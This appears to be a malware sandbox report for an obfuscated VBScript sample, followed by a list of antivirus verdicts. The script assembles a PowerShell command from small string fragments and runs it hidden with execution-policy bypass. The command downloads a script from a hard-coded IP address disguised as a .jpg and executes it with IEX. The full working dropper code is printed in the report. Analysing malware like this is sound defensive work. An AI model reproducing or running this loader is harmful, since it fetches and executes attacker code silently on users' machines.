Static | ZeroBOX
No static analysis available.
Dim MPtqt(82), dMlTd, i
' Define each part based on the provided order
MPtqt(0) = "[BY"
MPtqt(1) = "Te["
MPtqt(2) = "]];"
MPtqt(3) = "$A1"
MPtqt(4) = "23="
MPtqt(5) = "'Ie"
MPtqt(6) = "X(N"
MPtqt(7) = "eW-"
MPtqt(8) = "OBJ"
MPtqt(9) = "eCT"
MPtqt(10) = " Ne"
MPtqt(11) = "T.W"
MPtqt(12) = "';$"
MPtqt(13) = "B45"
MPtqt(14) = "6='"
MPtqt(15) = "eBC"
MPtqt(16) = "LIe"
MPtqt(17) = "NT)"
MPtqt(18) = ".DO"
MPtqt(19) = "WNL"
MPtqt(20) = "O';"
MPtqt(21) = "[BY"
MPtqt(22) = "Te["
MPtqt(23) = "]];"
MPtqt(24) = "$C7"
MPtqt(25) = "89="
MPtqt(26) = "'/="
MPtqt(27) = "//="
MPtqt(28) = "//="
MPtqt(29) = "//="
MPtqt(30) = "//="
MPtqt(31) = "//="
MPtqt(32) = "//="
MPtqt(33) = "//="
MPtqt(34) = "//="
MPtqt(35) = "//="
MPtqt(36) = "/('"
MPtqt(37) = "'ht"
MPtqt(38) = "tp:"
MPtqt(39) = "//5"
MPtqt(40) = "1.2"
MPtqt(41) = "54."
MPtqt(42) = "49."
MPtqt(43) = "49:"
MPtqt(44) = "222"
MPtqt(45) = "/tr"
MPtqt(46) = "uin"
MPtqt(47) = "tob"
MPtqt(48) = "rot"
MPtqt(49) = "h/c"
MPtqt(50) = "od."
MPtqt(51) = "jpg"
MPtqt(52) = "'')"
MPtqt(53) = "'.R"
MPtqt(54) = "ePL"
MPtqt(55) = "ACe"
MPtqt(56) = "('/"
MPtqt(57) = "=//"
MPtqt(58) = "=//"
MPtqt(59) = "=//"
MPtqt(60) = "=//"
MPtqt(61) = "=//"
MPtqt(62) = "=//"
MPtqt(63) = "=//"
MPtqt(64) = "=//"
MPtqt(65) = "=//"
MPtqt(66) = "=/'"
MPtqt(67) = ",'A"
MPtqt(68) = "DST"
MPtqt(69) = "RIN"
MPtqt(70) = "G')"
MPtqt(71) = ";[B"
MPtqt(72) = "YTe"
MPtqt(73) = "[]]"
MPtqt(74) = ";Ie"
MPtqt(75) = "X($"
MPtqt(76) = "A12"
MPtqt(77) = "3+$"
MPtqt(78) = "B45"
MPtqt(79) = "6+$"
MPtqt(80) = "C78"
MPtqt(81) = "9)"
' Combine the parts into one string
dMlTd = ""
For i = 0 To 82 - 1
dMlTd = dMlTd & MPtqt(i)
' Use the combinedParts in the shell execution
Set objShell = CreateObject("WScript.Shell")
objShell.Run "POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI " & dMlTd, 0, True
Set objShell = Nothing
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec ISB.Downloader!gen80
ESET-NOD32 PowerShell/Runner.A suspicious
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Emsisoft Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Tencent Script.Trojan.Generic.Hdhl
Ikarus Trojan.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.